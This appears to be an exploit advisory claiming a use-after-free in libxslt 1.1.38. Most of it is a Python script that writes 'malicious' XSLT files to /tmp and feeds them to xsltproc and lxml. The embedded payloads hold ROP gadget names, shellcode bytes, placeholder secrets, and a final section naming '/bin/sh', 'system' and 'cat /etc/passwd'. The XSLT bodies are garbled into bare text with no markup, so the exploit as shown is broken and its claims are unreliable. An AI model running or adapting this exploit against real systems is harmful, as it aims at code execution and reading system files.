=============================================================================================================================================
| # Title : libxslt Key Data Storage 1.1.38 memory corruption |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://gitlab.gnome.org/GNOME/libxml2/-/wikis/home |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/207871/
[+] Summary :
The vulnerability occurs due to improper handling of Result Value Trees (RVTs) when evaluating XSLT keys with certain XPath axes:
Global variables (xsl:variable) are stored as RVTs in a linked list using prev/next pointers
XSLT keys (xsl:key) using preceding:: axis traverse across RVT boundaries via these pointers
Memory corruption occurs when RVTs are freed but key tables retain references to their nodes
[+] Affected Version : All versions up to and including 1.1.38
[+] POC : python poc.py
#!/usr/bin/env python3
# libxslt_uaf_exploit.py
# استغلال ثغرة Use-After-Free في libxslt عبر Python lxml
import lxml.etree as ET
import sys
import os
import subprocess
from base64 import b64encode
class LibxsltUAFExploit:
def __init__(self):
self.xslt_content = None
self.xml_content = None
def create_malicious_xslt(self):
"""إنشاء ملف XSLT ضار لاستغلال الثغرة"""
self.xslt_content = '''
adminSuperSecret@123!Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9AKIAIOSFODNN7EXAMPLE4111-1111-1111-111112/25123
AAAAAAAA
0x7f8a1b002000
BBBBBBBB
0x7f8a1b002100pop rdi; retsystem@plt\\x31\\xc0\\x48\\xbb\\xd1\\x9d\\x96\\x91\\xd0\\x8c\\x97\\xff'''
with open('/tmp/exploit.xsl', 'w') as f:
f.write(self.xslt_content)
print("[+] تم إنشاء ملف XSLT الضار")
def create_target_xml(self):
"""إنشاء ملف XML هدف"""
self.xml_content = '''
Vulnerable App1.0Linuxtest_user'''
with open('/tmp/target.xml', 'w') as f:
f.write(self.xml_content)
print("[+] تم إنشاء ملف XML الهدف")
def exploit_via_python_lxml(self):
"""استغلال الثغرة عبر lxml مباشرة"""
print("[+] محاولة الاستغلال عبر Python lxml...")
try:
# تحميل وتحويل XML باستخدام XSLT
xml_doc = ET.parse('/tmp/target.xml')
xslt_doc = ET.parse('/tmp/exploit.xsl')
transform = ET.XSLT(xslt_doc)
# تنفيذ التحويل (تفعيل الثغرة)
result = transform(xml_doc)
print("[+] نتيجة الاستغلال:")
print(str(result))
except Exception as e:
print(f"[-] فشل الاستغلال عبر lxml: {e}")
def exploit_via_xsltproc(self):
"""استغلال الثغرة عبر xsltproc"""
print("[+] محاولة الاستغلال عبر xsltproc...")
try:
result = subprocess.run([
'xsltproc',
'/tmp/exploit.xsl',
'/tmp/target.xml'
], capture_output=True, text=True, timeout=10)
print("[+] stdout:")
print(result.stdout)
if result.stderr:
print("[+] stderr (قد يحتوي على معلومات التصحيح):")
print(result.stderr)
except subprocess.TimeoutExpired:
print("[-] انتهت مهلة التنفيذ - احتمال تحطم التطبيق")
except Exception as e:
print(f"[-] خطأ في التنفيذ: {e}")
def check_vulnerability(self):
"""فحص إذا كان النظام مصاب"""
print("[+] فحص إصدار libxslt...")
try:
# فحص إصدار lxml/libxslt
import lxml
print(f"[+] إصدار lxml: {lxml.__version__}")
# فحص إذا كان xsltproc مثبت
result = subprocess.run(['xsltproc', '--version'],
capture_output=True, text=True)
if 'libxslt' in result.stderr:
print("[+] xsltproc مثبت:")
print(result.stderr)
return True
else:
print("[-] xsltproc غير مثبت")
return False
except Exception as e:
print(f"[-] خطأ في الفحص: {e}")
return False
def advanced_exploit(self):
"""استغلال متقدم مع تحكم أفضل"""
print("[+] بدء الاستغلال المتقدم...")
# إنشاء استغلال متعدد المراحل
advanced_xslt = '''
STAGE1_PAYLOAD
CHUNK_ACHUNK_B
STAGE2_PAYLOAD
CHUNK_CCHUNK_DTRIGGEREDCONFIRMED'''
with open('/tmp/advanced_exploit.xsl', 'w') as f:
f.write(advanced_xslt)
try:
result = subprocess.run([
'xsltproc',
'/tmp/advanced_exploit.xsl',
'/tmp/target.xml'
], capture_output=True, text=True)
print("[+] نتيجة الاستغلال المتقدم:")
print(result.stdout)
except Exception as e:
print(f"[-] فشل الاستغلال المتقدم: {e}")
def cleanup(self):
"""تنظيف الملفات المؤقتة"""
try:
files_to_remove = [
'/tmp/exploit.xsl',
'/tmp/target.xml',
'/tmp/advanced_exploit.xsl'
]
for file in files_to_remove:
if os.path.exists(file):
os.remove(file)
print("[+] تم تنظيف الملفات المؤقتة")
except Exception as e:
print(f"[-] خطأ في التنظيف: {e}")
def main():
exploit = LibxsltUAFExploit()
print("=" * 50)
print("مستغلة ثغرة libxslt UAF - Python Edition")
print("=" * 50)
# فحص القابلية للاستغلال
if not exploit.check_vulnerability():
print("[-] النظام لا يبدو مصاباً")
return
try:
# إنشاء الملفات
exploit.create_malicious_xslt()
exploit.create_target_xml()
# محاولات الاستغلال
exploit.exploit_via_xsltproc()
print("\n" + "="*30)
exploit.exploit_via_python_lxml()
print("\n" + "="*30)
exploit.advanced_exploit()
except KeyboardInterrupt:
print("\n[!] تم إيقاف الاستغلال بواسطة المستخدم")
except Exception as e:
print(f"[-] خطأ غير متوقع: {e}")
finally:
# تنظيف
exploit.cleanup()
if __name__ == "__main__":
main()
====================================
[+] 1 Setting up memory structures :
====================================
Important DataOther Data
=======*****=====
value1value2value3data1data2Sensitive Information
=========******=================
[+] Manipulating Memory Planning
================================
Admin123!SECRET-TOKEN-ABCD4111111111111111:
=========******==================
[+] Exploiting the Use-After-Free
=================================
=========******==================
[+] Exploiting the code
=================================
bin/sh0x43434343AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABEFORE_FREE0x58585858systemcat /etc/passwd
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================